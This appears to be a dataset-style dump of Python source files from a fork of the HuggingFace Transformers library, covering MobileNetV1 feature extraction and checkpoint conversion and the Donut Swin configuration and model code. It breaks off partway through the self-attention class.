repo_id stringlengths 6 101 | size int64 367 5.14M | file_path stringlengths 2 269 | content stringlengths 367 5.14M |
|---|---|---|---|
27182812/ChatGLM-LLaMA-chinese-insturct | 1,222 | src/transformers/models/mobilenet_v1/feature_extraction_mobilenet_v1.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Feature extractor class for MobileNetV1."""
import warnings
from ...utils import logging
from .image_processing_mobilenet_v1 import MobileNetV1ImageProcessor
logger = logging.get_logger(__name__)
class MobileNetV1FeatureExtractor(MobileNetV1ImageProcessor):
    # Deprecated backward-compatibility alias: all functionality lives in
    # MobileNetV1ImageProcessor; this subclass only emits a FutureWarning.
    def __init__(self, *args, **kwargs) -> None:
        """Instantiate the image processor, warning that this class is deprecated."""
        warnings.warn(
            "The class MobileNetV1FeatureExtractor is deprecated and will be removed in version 5 of Transformers."
            " Please use MobileNetV1ImageProcessor instead.",
            FutureWarning,
        )
        super().__init__(*args, **kwargs)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 4,942 | src/transformers/models/mobilenet_v1/convert_original_tf_checkpoint_to_pytorch.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Convert MobileNetV1 checkpoints from the tensorflow/models library."""
import argparse
import json
import re
from pathlib import Path
import requests
import torch
from huggingface_hub import hf_hub_download
from PIL import Image
from transformers import (
MobileNetV1Config,
MobileNetV1FeatureExtractor,
MobileNetV1ForImageClassification,
load_tf_weights_in_mobilenet_v1,
)
from transformers.utils import logging
logging.set_verbosity_info()
logger = logging.get_logger(__name__)
def get_mobilenet_v1_config(model_name):
    """Build a `MobileNetV1Config` for the given TensorFlow checkpoint name.

    Args:
        model_name (`str`):
            Checkpoint name in the form `mobilenet_v1_<depth>_<size>`, e.g.
            `"mobilenet_v1_1.0_224"`.

    Returns:
        `MobileNetV1Config`: configuration with depth multiplier, image size
        and the 1001 ImageNet labels (index 0 is "background") filled in.

    Raises:
        ValueError: if a quantized checkpoint name (`*_quant`) is passed.
    """
    config = MobileNetV1Config(layer_norm_eps=0.001)

    if "_quant" in model_name:
        raise ValueError("Quantized models are not supported.")

    matches = re.match(r"^mobilenet_v1_([^_]*)_([^_]*)$", model_name)
    if matches:
        config.depth_multiplier = float(matches[1])
        config.image_size = int(matches[2])

    # The TensorFlow version of MobileNetV1 predicts 1001 classes instead of
    # the usual 1000. The first class (index 0) is "background".
    config.num_labels = 1001
    filename = "imagenet-1k-id2label.json"
    repo_id = "huggingface/label-files"
    # Fix: read the label file through a context manager so the file handle is
    # closed deterministically instead of being leaked.
    with open(hf_hub_download(repo_id, filename, repo_type="dataset"), "r") as label_file:
        id2label = json.load(label_file)
    # Shift every ImageNet id by one to make room for the "background" class.
    id2label = {int(k) + 1: v for k, v in id2label.items()}
    id2label[0] = "background"
    config.id2label = id2label
    config.label2id = {v: k for k, v in id2label.items()}

    return config
# We will verify our results on an image of cute cats
def prepare_img():
    """Fetch the COCO cats test image used to sanity-check the conversion."""
    image_url = "http://images.cocodataset.org/val2017/000000039769.jpg"
    response = requests.get(image_url, stream=True)
    return Image.open(response.raw)
@torch.no_grad()
def convert_movilevit_checkpoint(model_name, checkpoint_path, pytorch_dump_folder_path, push_to_hub=False):
    """
    Copy/paste/tweak model's weights to our MobileNetV1 structure.

    Args:
        model_name: checkpoint name in the form `mobilenet_v1_<depth>_<size>`.
        checkpoint_path: path to the original TensorFlow checkpoint (.ckpt).
        pytorch_dump_folder_path: output directory for the converted model.
        push_to_hub: when True, also pushes model and feature extractor to the
            Hub under `google/<model_name>`.
    """
    config = get_mobilenet_v1_config(model_name)

    # Load 🤗 model
    model = MobileNetV1ForImageClassification(config).eval()

    # Load weights from TensorFlow checkpoint
    load_tf_weights_in_mobilenet_v1(model, config, checkpoint_path)

    # Check outputs on an image, prepared by MobileNetV1FeatureExtractor
    # (shortest edge resized to image_size + 32, then center-cropped to image_size).
    feature_extractor = MobileNetV1FeatureExtractor(
        crop_size={"width": config.image_size, "height": config.image_size},
        size={"shortest_edge": config.image_size + 32},
    )
    encoding = feature_extractor(images=prepare_img(), return_tensors="pt")
    outputs = model(**encoding)
    logits = outputs.logits

    # 1001 classes: 1000 ImageNet classes plus "background" at index 0.
    assert logits.shape == (1, 1001)

    # Reference logits were computed with the original TF models for two known
    # checkpoints; other checkpoints only get the shape check above.
    if model_name == "mobilenet_v1_1.0_224":
        expected_logits = torch.tensor([-4.1739, -1.1233, 3.1205])
    elif model_name == "mobilenet_v1_0.75_192":
        expected_logits = torch.tensor([-3.9440, -2.3141, -0.3333])
    else:
        expected_logits = None

    if expected_logits is not None:
        assert torch.allclose(logits[0, :3], expected_logits, atol=1e-4)

    Path(pytorch_dump_folder_path).mkdir(exist_ok=True)
    print(f"Saving model {model_name} to {pytorch_dump_folder_path}")
    model.save_pretrained(pytorch_dump_folder_path)
    print(f"Saving feature extractor to {pytorch_dump_folder_path}")
    feature_extractor.save_pretrained(pytorch_dump_folder_path)

    if push_to_hub:
        print("Pushing to the hub...")
        repo_id = "google/" + model_name
        feature_extractor.push_to_hub(repo_id)
        model.push_to_hub(repo_id)
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    # Required parameters
    parser.add_argument(
        "--model_name",
        default="mobilenet_v1_1.0_224",
        type=str,
        # Fix: user-facing help text read "Should in the form" (missing verb).
        help="Name of the MobileNetV1 model you'd like to convert. Should be in the form 'mobilenet_v1_<depth>_<size>'.",
    )
    parser.add_argument(
        "--checkpoint_path", required=True, type=str, help="Path to the original TensorFlow checkpoint (.ckpt file)."
    )
    parser.add_argument(
        "--pytorch_dump_folder_path", required=True, type=str, help="Path to the output PyTorch model directory."
    )
    parser.add_argument(
        "--push_to_hub", action="store_true", help="Whether or not to push the converted model to the 🤗 hub."
    )

    args = parser.parse_args()
    convert_movilevit_checkpoint(
        args.model_name, args.checkpoint_path, args.pytorch_dump_folder_path, args.push_to_hub
    )
|
27182812/ChatGLM-LLaMA-chinese-insturct | 2,455 | src/transformers/models/donut/__init__.py | # Copyright 2022 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...utils import OptionalDependencyNotAvailable, _LazyModule, is_torch_available, is_vision_available
# Declares the package's public submodules/symbols; the actual imports are
# deferred by `_LazyModule` below so that `import transformers` stays fast.
_import_structure = {
    "configuration_donut_swin": ["DONUT_SWIN_PRETRAINED_CONFIG_ARCHIVE_MAP", "DonutSwinConfig"],
    "processing_donut": ["DonutProcessor"],
}

# Modeling code needs torch; register it only when torch is installed.
try:
    if not is_torch_available():
        raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
    pass
else:
    _import_structure["modeling_donut_swin"] = [
        "DONUT_SWIN_PRETRAINED_MODEL_ARCHIVE_LIST",
        "DonutSwinModel",
        "DonutSwinPreTrainedModel",
    ]

# Image processing needs vision dependencies (PIL); register conditionally.
try:
    if not is_vision_available():
        raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
    pass
else:
    _import_structure["feature_extraction_donut"] = ["DonutFeatureExtractor"]
    _import_structure["image_processing_donut"] = ["DonutImageProcessor"]

# Static type checkers see real imports; at runtime the module object is
# replaced with a lazy proxy that imports submodules on first attribute access.
if TYPE_CHECKING:
    from .configuration_donut_swin import DONUT_SWIN_PRETRAINED_CONFIG_ARCHIVE_MAP, DonutSwinConfig
    from .processing_donut import DonutProcessor

    try:
        if not is_torch_available():
            raise OptionalDependencyNotAvailable()
    except OptionalDependencyNotAvailable:
        pass
    else:
        from .modeling_donut_swin import (
            DONUT_SWIN_PRETRAINED_MODEL_ARCHIVE_LIST,
            DonutSwinModel,
            DonutSwinPreTrainedModel,
        )

    try:
        if not is_vision_available():
            raise OptionalDependencyNotAvailable()
    except OptionalDependencyNotAvailable:
        pass
    else:
        from .feature_extraction_donut import DonutFeatureExtractor
        from .image_processing_donut import DonutImageProcessor

else:
    import sys

    sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 5,981 | src/transformers/models/donut/configuration_donut_swin.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Donut Swin Transformer model configuration"""
from ...configuration_utils import PretrainedConfig
from ...utils import logging
logger = logging.get_logger(__name__)
DONUT_SWIN_PRETRAINED_CONFIG_ARCHIVE_MAP = {
"naver-clova-ix/donut-base": "https://huggingface.co/naver-clova-ix/donut-base/resolve/main/config.json",
# See all Donut models at https://huggingface.co/models?filter=donut-swin
}
class DonutSwinConfig(PretrainedConfig):
    r"""
    This is the configuration class to store the configuration of a [`DonutSwinModel`]. It is used to instantiate a
    Donut model according to the specified arguments, defining the model architecture. Instantiating a configuration
    with the defaults will yield a similar configuration to that of the Donut
    [naver-clova-ix/donut-base](https://huggingface.co/naver-clova-ix/donut-base) architecture.

    Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
    documentation from [`PretrainedConfig`] for more information.

    Args:
        image_size (`int`, *optional*, defaults to 224):
            The size (resolution) of each image.
        patch_size (`int`, *optional*, defaults to 4):
            The size (resolution) of each patch.
        num_channels (`int`, *optional*, defaults to 3):
            The number of input channels.
        embed_dim (`int`, *optional*, defaults to 96):
            Dimensionality of patch embedding.
        depths (`list(int)`, *optional*, defaults to [2, 2, 6, 2]):
            Depth of each layer in the Transformer encoder.
        num_heads (`list(int)`, *optional*, defaults to [3, 6, 12, 24]):
            Number of attention heads in each layer of the Transformer encoder.
        window_size (`int`, *optional*, defaults to 7):
            Size of windows.
        mlp_ratio (`float`, *optional*, defaults to 4.0):
            Ratio of MLP hidden dimensionality to embedding dimensionality.
        qkv_bias (`bool`, *optional*, defaults to True):
            Whether or not a learnable bias should be added to the queries, keys and values.
        hidden_dropout_prob (`float`, *optional*, defaults to 0.0):
            The dropout probability for all fully connected layers in the embeddings and encoder.
        attention_probs_dropout_prob (`float`, *optional*, defaults to 0.0):
            The dropout ratio for the attention probabilities.
        drop_path_rate (`float`, *optional*, defaults to 0.1):
            Stochastic depth rate.
        hidden_act (`str` or `function`, *optional*, defaults to `"gelu"`):
            The non-linear activation function (function or string) in the encoder. If string, `"gelu"`, `"relu"`,
            `"selu"` and `"gelu_new"` are supported.
        use_absolute_embeddings (`bool`, *optional*, defaults to False):
            Whether or not to add absolute position embeddings to the patch embeddings.
        initializer_range (`float`, *optional*, defaults to 0.02):
            The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
        layer_norm_eps (`float`, *optional*, defaults to 1e-12):
            The epsilon used by the layer normalization layers.

    Example:

    ```python
    >>> from transformers import DonutSwinConfig, DonutSwinModel

    >>> # Initializing a Donut naver-clova-ix/donut-base style configuration
    >>> configuration = DonutSwinConfig()

    >>> # Randomly initializing a model from the naver-clova-ix/donut-base style configuration
    >>> model = DonutSwinModel(configuration)

    >>> # Accessing the model configuration
    >>> configuration = model.config
    ```"""

    model_type = "donut-swin"

    # Map the generic PretrainedConfig attribute names onto Swin's own names.
    attribute_map = {
        "num_attention_heads": "num_heads",
        "num_hidden_layers": "num_layers",
    }

    # NOTE(review): `depths`/`num_heads` use mutable list defaults — harmless
    # here because they are only read, never mutated, but callers should not
    # append to `config.depths` of a default-constructed config.
    def __init__(
        self,
        image_size=224,
        patch_size=4,
        num_channels=3,
        embed_dim=96,
        depths=[2, 2, 6, 2],
        num_heads=[3, 6, 12, 24],
        window_size=7,
        mlp_ratio=4.0,
        qkv_bias=True,
        hidden_dropout_prob=0.0,
        attention_probs_dropout_prob=0.0,
        drop_path_rate=0.1,
        hidden_act="gelu",
        use_absolute_embeddings=False,
        initializer_range=0.02,
        layer_norm_eps=1e-5,
        **kwargs,
    ):
        super().__init__(**kwargs)

        self.image_size = image_size
        self.patch_size = patch_size
        self.num_channels = num_channels
        self.embed_dim = embed_dim
        self.depths = depths
        # One encoder "layer" (stage) per entry in `depths`.
        self.num_layers = len(depths)
        self.num_heads = num_heads
        self.window_size = window_size
        self.mlp_ratio = mlp_ratio
        self.qkv_bias = qkv_bias
        self.hidden_dropout_prob = hidden_dropout_prob
        self.attention_probs_dropout_prob = attention_probs_dropout_prob
        self.drop_path_rate = drop_path_rate
        self.hidden_act = hidden_act
        self.use_absolute_embeddings = use_absolute_embeddings
        self.layer_norm_eps = layer_norm_eps
        self.initializer_range = initializer_range
        # we set the hidden_size attribute in order to make Swin work with VisionEncoderDecoderModel
        # this indicates the channel dimension after the last stage of the model
        self.hidden_size = int(embed_dim * 2 ** (len(depths) - 1))
|
27182812/ChatGLM-LLaMA-chinese-insturct | 43,502 | src/transformers/models/donut/modeling_donut_swin.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch Donut Swin Transformer model.
This implementation is identical to a regular Swin Transformer, without final layer norm on top of the final hidden
states."""
import collections.abc
import math
from dataclasses import dataclass
from typing import Optional, Tuple, Union
import torch
import torch.utils.checkpoint
from torch import nn
from ...activations import ACT2FN
from ...modeling_utils import PreTrainedModel
from ...pytorch_utils import find_pruneable_heads_and_indices, meshgrid, prune_linear_layer
from ...utils import (
ModelOutput,
add_code_sample_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
logging,
)
from .configuration_donut_swin import DonutSwinConfig
logger = logging.get_logger(__name__)
# General docstring
_CONFIG_FOR_DOC = "DonutSwinConfig"
# Base docstring
_CHECKPOINT_FOR_DOC = "https://huggingface.co/naver-clova-ix/donut-base"
_EXPECTED_OUTPUT_SHAPE = [1, 49, 768]
DONUT_SWIN_PRETRAINED_MODEL_ARCHIVE_LIST = [
"naver-clova-ix/donut-base",
# See all Donut Swin models at https://huggingface.co/models?filter=donut
]
@dataclass
# Copied from transformers.models.swin.modeling_swin.SwinEncoderOutput with Swin->DonutSwin
class DonutSwinEncoderOutput(ModelOutput):
    """
    DonutSwin encoder's outputs, with potential hidden states and attentions.

    Args:
        last_hidden_state (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`):
            Sequence of hidden-states at the output of the last layer of the model.
        hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
            Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each stage) of
            shape `(batch_size, sequence_length, hidden_size)`.

            Hidden-states of the model at the output of each layer plus the initial embedding outputs.
        attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
            Tuple of `torch.FloatTensor` (one for each stage) of shape `(batch_size, num_heads, sequence_length,
            sequence_length)`.

            Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
            heads.
        reshaped_hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
            Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each stage) of
            shape `(batch_size, hidden_size, height, width)`.

            Hidden-states of the model at the output of each layer plus the initial embedding outputs reshaped to
            include the spatial dimensions.
    """

    # Every field defaults to None so the encoder can populate only the
    # outputs that were actually requested.
    last_hidden_state: torch.FloatTensor = None
    hidden_states: Optional[Tuple[torch.FloatTensor]] = None
    attentions: Optional[Tuple[torch.FloatTensor]] = None
    reshaped_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
@dataclass
# Copied from transformers.models.swin.modeling_swin.SwinModelOutput with Swin->DonutSwin
class DonutSwinModelOutput(ModelOutput):
    """
    DonutSwin model's outputs that also contains a pooling of the last hidden states.

    Args:
        last_hidden_state (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`):
            Sequence of hidden-states at the output of the last layer of the model.
        pooler_output (`torch.FloatTensor` of shape `(batch_size, hidden_size)`, *optional*, returned when `add_pooling_layer=True` is passed):
            Average pooling of the last layer hidden-state.
        hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
            Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each stage) of
            shape `(batch_size, sequence_length, hidden_size)`.

            Hidden-states of the model at the output of each layer plus the initial embedding outputs.
        attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
            Tuple of `torch.FloatTensor` (one for each stage) of shape `(batch_size, num_heads, sequence_length,
            sequence_length)`.

            Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
            heads.
        reshaped_hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
            Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each stage) of
            shape `(batch_size, hidden_size, height, width)`.

            Hidden-states of the model at the output of each layer plus the initial embedding outputs reshaped to
            include the spatial dimensions.
    """

    # Every field defaults to None so the model can populate only the outputs
    # that were actually requested.
    last_hidden_state: torch.FloatTensor = None
    pooler_output: Optional[torch.FloatTensor] = None
    hidden_states: Optional[Tuple[torch.FloatTensor]] = None
    attentions: Optional[Tuple[torch.FloatTensor]] = None
    reshaped_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
# Adapted from transformers.models.swin.modeling_swin.window_partition
def window_partition(input_feature, window_size):
    """
    Partitions the given input into windows.

    Takes a `(batch, height, width, channels)` tensor and returns
    `(num_windows * batch, window_size, window_size, channels)`, where windows
    are enumerated row-major over the window grid.
    """
    batch_size, height, width, num_channels = input_feature.shape
    rows = height // window_size
    cols = width // window_size
    # Split each spatial dim into (num_windows, window_size), then bring the
    # two intra-window axes next to each other before flattening.
    tiled = input_feature.view(batch_size, rows, window_size, cols, window_size, num_channels)
    tiled = tiled.permute(0, 1, 3, 2, 4, 5).contiguous()
    return tiled.view(-1, window_size, window_size, num_channels)
# Adapted from transformers.models.swin.modeling_swin.window_reverse
def window_reverse(windows, window_size, height, width):
    """
    Merges windows to produce higher resolution features.

    Inverse of `window_partition`: takes
    `(num_windows * batch, window_size, window_size, channels)` and returns
    `(batch, height, width, channels)`.
    """
    num_channels = windows.shape[-1]
    grid_h = height // window_size
    grid_w = width // window_size
    merged = windows.view(-1, grid_h, grid_w, window_size, window_size, num_channels)
    merged = merged.permute(0, 1, 3, 2, 4, 5).contiguous()
    return merged.view(-1, height, width, num_channels)
# Copied from transformers.models.swin.modeling_swin.SwinEmbeddings with Swin->DonutSwin
class DonutSwinEmbeddings(nn.Module):
    """
    Construct the patch and position embeddings. Optionally, also the mask token.
    """

    def __init__(self, config, use_mask_token=False):
        super().__init__()

        self.patch_embeddings = DonutSwinPatchEmbeddings(config)
        num_patches = self.patch_embeddings.num_patches
        self.patch_grid = self.patch_embeddings.grid_size
        # Learned token substituted for masked patches (masked image modeling).
        self.mask_token = nn.Parameter(torch.zeros(1, 1, config.embed_dim)) if use_mask_token else None

        if config.use_absolute_embeddings:
            self.position_embeddings = nn.Parameter(torch.zeros(1, num_patches + 1, config.embed_dim))
        else:
            self.position_embeddings = None

        self.norm = nn.LayerNorm(config.embed_dim)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)

    def forward(
        self, pixel_values: Optional[torch.FloatTensor], bool_masked_pos: Optional[torch.BoolTensor] = None
    ) -> Tuple[torch.Tensor]:
        # `output_dimensions` is the (height, width) of the patch grid produced
        # by the patch projection; downstream stages need it for reshaping.
        embeddings, output_dimensions = self.patch_embeddings(pixel_values)
        embeddings = self.norm(embeddings)
        batch_size, seq_len, _ = embeddings.size()

        if bool_masked_pos is not None:
            mask_tokens = self.mask_token.expand(batch_size, seq_len, -1)
            # replace the masked visual tokens by mask_tokens
            mask = bool_masked_pos.unsqueeze(-1).type_as(mask_tokens)
            embeddings = embeddings * (1.0 - mask) + mask_tokens * mask

        if self.position_embeddings is not None:
            embeddings = embeddings + self.position_embeddings

        embeddings = self.dropout(embeddings)

        return embeddings, output_dimensions
# Copied from transformers.models.swin.modeling_swin.SwinPatchEmbeddings
class DonutSwinPatchEmbeddings(nn.Module):
    """
    This class turns `pixel_values` of shape `(batch_size, num_channels, height, width)` into the initial
    `hidden_states` (patch embeddings) of shape `(batch_size, seq_length, hidden_size)` to be consumed by a
    Transformer.
    """

    def __init__(self, config):
        super().__init__()
        image_size, patch_size = config.image_size, config.patch_size
        num_channels, hidden_size = config.num_channels, config.embed_dim
        # Both sizes may be given as a scalar or an (h, w) pair.
        image_size = image_size if isinstance(image_size, collections.abc.Iterable) else (image_size, image_size)
        patch_size = patch_size if isinstance(patch_size, collections.abc.Iterable) else (patch_size, patch_size)
        num_patches = (image_size[1] // patch_size[1]) * (image_size[0] // patch_size[0])
        self.image_size = image_size
        self.patch_size = patch_size
        self.num_channels = num_channels
        self.num_patches = num_patches
        self.grid_size = (image_size[0] // patch_size[0], image_size[1] // patch_size[1])

        # Non-overlapping patch projection: kernel == stride == patch size.
        self.projection = nn.Conv2d(num_channels, hidden_size, kernel_size=patch_size, stride=patch_size)

    def maybe_pad(self, pixel_values, height, width):
        # `nn.functional.pad` pads starting from the last dimension: the first
        # pair pads width; the four-value pad below pads height only.
        if width % self.patch_size[1] != 0:
            pad_values = (0, self.patch_size[1] - width % self.patch_size[1])
            pixel_values = nn.functional.pad(pixel_values, pad_values)
        if height % self.patch_size[0] != 0:
            pad_values = (0, 0, 0, self.patch_size[0] - height % self.patch_size[0])
            pixel_values = nn.functional.pad(pixel_values, pad_values)
        return pixel_values

    def forward(self, pixel_values: Optional[torch.FloatTensor]) -> Tuple[torch.Tensor, Tuple[int]]:
        _, num_channels, height, width = pixel_values.shape
        if num_channels != self.num_channels:
            raise ValueError(
                "Make sure that the channel dimension of the pixel values match with the one set in the configuration."
            )
        # pad the input to be divisible by self.patch_size, if needed
        pixel_values = self.maybe_pad(pixel_values, height, width)
        embeddings = self.projection(pixel_values)
        _, _, height, width = embeddings.shape
        # (height, width) of the resulting patch grid.
        output_dimensions = (height, width)
        # (batch, hidden, h, w) -> (batch, h*w, hidden)
        embeddings = embeddings.flatten(2).transpose(1, 2)

        return embeddings, output_dimensions
# Copied from transformers.models.swin.modeling_swin.SwinPatchMerging
class DonutSwinPatchMerging(nn.Module):
    """
    Patch Merging Layer.

    Args:
        input_resolution (`Tuple[int]`):
            Resolution of input feature.
        dim (`int`):
            Number of input channels.
        norm_layer (`nn.Module`, *optional*, defaults to `nn.LayerNorm`):
            Normalization layer class.
    """

    def __init__(self, input_resolution: Tuple[int], dim: int, norm_layer: nn.Module = nn.LayerNorm) -> None:
        super().__init__()
        self.input_resolution = input_resolution
        self.dim = dim
        # Concatenating a 2x2 neighborhood yields 4*dim channels, projected
        # down to 2*dim (halve resolution, double channels).
        self.reduction = nn.Linear(4 * dim, 2 * dim, bias=False)
        self.norm = norm_layer(4 * dim)

    def maybe_pad(self, input_feature, height, width):
        # Pad height/width up to even numbers so the 2x2 subsampling is valid.
        should_pad = (height % 2 == 1) or (width % 2 == 1)
        if should_pad:
            pad_values = (0, 0, 0, width % 2, 0, height % 2)
            input_feature = nn.functional.pad(input_feature, pad_values)

        return input_feature

    def forward(self, input_feature: torch.Tensor, input_dimensions: Tuple[int, int]) -> torch.Tensor:
        height, width = input_dimensions
        # `dim` is height * width
        batch_size, dim, num_channels = input_feature.shape

        input_feature = input_feature.view(batch_size, height, width, num_channels)
        # pad input to be divisible by width and height, if needed
        input_feature = self.maybe_pad(input_feature, height, width)
        # Gather the four corners of every 2x2 block:
        # [batch_size, height/2, width/2, num_channels]
        input_feature_0 = input_feature[:, 0::2, 0::2, :]
        # [batch_size, height/2, width/2, num_channels]
        input_feature_1 = input_feature[:, 1::2, 0::2, :]
        # [batch_size, height/2, width/2, num_channels]
        input_feature_2 = input_feature[:, 0::2, 1::2, :]
        # [batch_size, height/2, width/2, num_channels]
        input_feature_3 = input_feature[:, 1::2, 1::2, :]
        # batch_size height/2 width/2 4*num_channels
        input_feature = torch.cat([input_feature_0, input_feature_1, input_feature_2, input_feature_3], -1)
        input_feature = input_feature.view(batch_size, -1, 4 * num_channels)  # batch_size height/2*width/2 4*C

        input_feature = self.norm(input_feature)
        input_feature = self.reduction(input_feature)

        return input_feature
# Based on transformers.models.swin.modeling_swin.drop_path (and timm's DropPath)
def drop_path(input, drop_prob=0.0, training=False, scale_by_keep=True):
    """
    Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).

    Comment by Ross Wightman: This is the same as the DropConnect impl I created for EfficientNet, etc networks,
    however, the original name is misleading as 'Drop Connect' is a different form of dropout in a separate paper...
    See discussion: https://github.com/tensorflow/tpu/issues/494#issuecomment-532968956 ... I've opted for changing the
    layer and argument names to 'drop path' rather than mix DropConnect as a layer name and use 'survival rate' as the
    argument.

    Args:
        input (`torch.Tensor`): tensor of any shape; dropping is applied per
            sample along the first dimension.
        drop_prob (`float`, *optional*, defaults to 0.0): probability of zeroing a sample.
        training (`bool`, *optional*, defaults to `False`): when False, the input
            is returned unchanged.
        scale_by_keep (`bool`, *optional*, defaults to `True`): rescale surviving
            samples by 1 / keep_prob so the expected value is preserved.
    """
    if drop_prob == 0.0 or not training:
        return input
    keep_prob = 1 - drop_prob
    shape = (input.shape[0],) + (1,) * (input.ndim - 1)  # work with diff dim tensors, not just 2D ConvNets
    random_tensor = keep_prob + torch.rand(shape, dtype=input.dtype, device=input.device)
    random_tensor.floor_()  # binarize
    # Bug fix: `scale_by_keep` was previously accepted but ignored — the output
    # was always rescaled by 1/keep_prob. Honor it (default True keeps the old
    # behavior for all existing callers).
    if keep_prob > 0.0 and scale_by_keep:
        random_tensor.div_(keep_prob)
    return input * random_tensor
# Adapted from transformers.models.swin.modeling_swin.SwinDropPath
class DonutSwinDropPath(nn.Module):
    """Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks)."""

    def __init__(self, drop_prob: Optional[float] = None) -> None:
        super().__init__()
        self.drop_prob = drop_prob

    def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
        # Delegate to the functional implementation; only active in training mode.
        return drop_path(hidden_states, self.drop_prob, self.training)

    def extra_repr(self) -> str:
        # Shown in the module's repr, e.g. "DonutSwinDropPath(p=0.1)".
        return f"p={self.drop_prob}"
# Copied from transformers.models.swin.modeling_swin.SwinSelfAttention with Swin->DonutSwin
class DonutSwinSelfAttention(nn.Module):
    # Windowed multi-head self-attention with a learned relative position bias.
    def __init__(self, config, dim, num_heads, window_size):
        super().__init__()
        if dim % num_heads != 0:
            raise ValueError(
                f"The hidden size ({dim}) is not a multiple of the number of attention heads ({num_heads})"
            )

        self.num_attention_heads = num_heads
        self.attention_head_size = int(dim / num_heads)
        self.all_head_size = self.num_attention_heads * self.attention_head_size
        self.window_size = (
            window_size if isinstance(window_size, collections.abc.Iterable) else (window_size, window_size)
        )

        # One learnable bias per (relative offset, head); offsets range over
        # (2*Wh - 1) x (2*Ww - 1) possible displacements within a window.
        self.relative_position_bias_table = nn.Parameter(
            torch.zeros((2 * self.window_size[0] - 1) * (2 * self.window_size[1] - 1), num_heads)
        )

        # get pair-wise relative position index for each token inside the window
        coords_h = torch.arange(self.window_size[0])
        coords_w = torch.arange(self.window_size[1])
        coords = torch.stack(meshgrid([coords_h, coords_w], indexing="ij"))
        coords_flatten = torch.flatten(coords, 1)
        relative_coords = coords_flatten[:, :, None] - coords_flatten[:, None, :]
        relative_coords = relative_coords.permute(1, 2, 0).contiguous()
        # Shift offsets to start at 0, then fold (dh, dw) into a single index
        # into the bias table.
        relative_coords[:, :, 0] += self.window_size[0] - 1
        relative_coords[:, :, 1] += self.window_size[1] - 1
        relative_coords[:, :, 0] *= 2 * self.window_size[1] - 1
        relative_position_index = relative_coords.sum(-1)
        # Buffer (not a parameter): the index map is fixed for a given window size.
        self.register_buffer("relative_position_index", relative_position_index)

        self.query = nn.Linear(self.all_head_size, self.all_head_size, bias=config.qkv_bias)
        self.key = nn.Linear(self.all_head_size, self.all_head_size, bias=config.qkv_bias)
